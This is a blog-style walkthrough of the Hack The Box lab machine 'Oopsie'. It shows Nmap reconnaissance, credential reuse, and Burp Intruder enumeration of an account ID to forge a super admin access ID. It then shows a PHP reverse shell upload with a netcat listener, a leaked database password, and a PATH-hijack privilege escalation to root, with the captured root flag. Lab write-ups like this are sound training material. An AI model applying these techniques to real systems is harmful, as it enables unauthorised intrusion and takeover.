Oopsie has been Pwned!

Hack The Box Oopsie has been Pwned!

Hello again, it’s time for another Hack The Box adventure as we take on Oopsie.

Reconnaissance

As always, I started by spinning up the target host and connecting to the VPN. Once connected I ran an Nmap scan to see what services were availible.

sudo nmap -sC -sV -O -p0- 10.10.10.28
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

The Nmap scan showed that only port 22 (Secure Shell) and port 80 (HTTP) were open. As there wasn’t much point trying to hack the SSH login via brute force (and as it isn’t a preferred method of exploiting a box) I started by browsing the website. The website was fairly basic and at first glance didn’t offer much.

A picture of the megacorp automotive website we want to hack
MegaCorp Automotive Website

There are many tools to crawl/spider a website such as dirb and gobuster but on this occasion I used Burp Suite. Using Burp Suite. Burp Suite is a web application security analysis or hacking tool. I turned off intercept and loaded the website in the built in Burp Browser (Chromimum).

A picture of intercepting the request from the application we want to hack
Burp Suite Browser

Burp has a built in spidering/crawling tool that will search through the contents of the web page. The application appeared to have a login url at the following extension.

http://10.10.10.28/cdn-cgi/login.php

Crawling the rest of the website didn’t appear to reveal any other sensitive directories or information. There was a login page but no credentials. We could have tried to hack the login page using a brute force attack with intruder but first lets try the credentials we found on the previous box Archetype.

BINGO, the MEGACORP_4dm1n!! password from the Archetype box history worked. The first thing I noticed when logged in was that there was an upload page. Unfortunately it’s never that simple. Visiting the upload page returned an error that I needed to be super admin. Looking around the site a bit more revealed some interesting information on the Repair Management System page.

A picture of the repair management system we need to hack
MegaCorp Automotive Repair Management System

The admin user appeared to have an “access ID”. I wanted to investigate this “access ID” further so I captured the request using Burp intercept and noticed that when viewing the account page, there was an $id paramter.

A picture showing the get request of the parameter we want to hack
Burp Request Captured

I sent this request to Burp Intruder and cleared the payloads. Once the payloads were cleared I added a payload to the value 1 in the $id parameter. I then used seq on linux to generate a payload list.

seq 1 100
1
2
3
snipped
98
99
100

I then copied and pasted the results in the payload section of intruder. There was one final option to configure before moving forward. In the options tab there is setting to follow redirections and to process cookies in redirections. Both of those needed to be ticked in order to launch the hack properly.

A picture showing the payload settings that we are using for the hack
Redirection Options

Once the settings were in place, I launched the hack. One tip for intruder attacks is to sort the results by the response length. Most of the time you will find that the response length is the same. However, if there is something interesting then the length of the response will likely be different. BINGO, the 30th request contained the information I needed. It looks like the super admin id was 30 and the Access ID 86575.

An image showing the super admin user that we are trying to hack
Super Admin Intercepted

I then turned intercept back on and made a request to the upload page. Burp suite intercepted the response and allowed me to edit it before sending the response to the server. I modified the Access ID value to that of the super admin and forwarded the request. The request was accepted by the server and I was allowed to access the upload page.

Foothold Hack

I used this PHP reverse shell script and modified it with my IP address and desired port. Next I needed to upload it to the website making sure to modify the Access ID value to the super admin Access ID when submitting the payload. I then set up my netcat listener.

sudo nc -lvp 1234

Once the listener was running it was time to find out where the script was uploaded to. As I said previously, there are many tools to do this including dirbuster and gobuster but in this instance, burp had already found the uploads directory. Using cURL I called the PHP script to trigger the reverse shell connection back to my machine. You could also visit the script directly in your browser to trigger it.

curl http://10.10.10.28/uploads/phpshell.php

I checked the history and didn’t find anything useful so I then listed out the contents of the home directory and found the user robert. I was able to read the contents of the user roberts home directory including the user.txt flag.

$ whoami
www-data
$ ls home
robert
$ ls home/robert
user.txt
$ cat /home/robert/user.txt
f2cXXXXXXXXXXXXXXXXXXXX981

After getting the user.txt file I decided to poke around on the server a bit more. I thought it best to check the web directory to see if there was anything I missed. As it turns out there was a db.php file which contained a username and password.

$ ls /var/www/html/cdn-cgi/login
admin.php db.php index.php script.js
$ cat /var/www/html/cdn-cgi/login/db.php
<?php
$conn = mysqli_connect(‘localhost’,’robert’,’M3g4C0rpUs3r!’,’garage’);
?>

Privilege Escalation Hack

This appeared to be the password for the robert user so I decided to switch to the robert user and see what he had permission to run by using the id command.

robert@oopsie:/$ id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)

robert had access to an interesting file called bugtracker. This was likely going to be the method of priveledge escalation so I decided to check it out. Using the tool strings on the bugtracker file it became evident that there was a clear path to privilege escalation.

obert@oopsie:/$ strings /usr/bin/bugtracker
/lib64/ld-linux-x86–64.so.2
SNIP
— — — — — — — — —
: EV Bug Tracker :
— — — — — — — — —
Provide Bug ID:
— — — — — — — -
cat /root/reports/

The file was calling the cat tool without the full path. This meant we could change our PATH environmental variable and make the cat tool to do something else, then when the script runs it will execute whatever we have put inside our newly created cat file. In this instance we created a new cat file in /tmp that when ran would spawn a shell.

export PATH=/tmp:$PATH
cd /tmp/
echo ‘/bin/sh’ > cat
chmod +x cat

Then when we run /usr/bin/bugtracker we are dropped in to a root shell where we can capture the root.txt file.

/usr/bin/bugtracker
cat /root/root.txt
af13b0bee69f8a877c3faf667f7beacf
A picture showing the box we wanted to hack has been pwned!
Oopsie has been Pwned!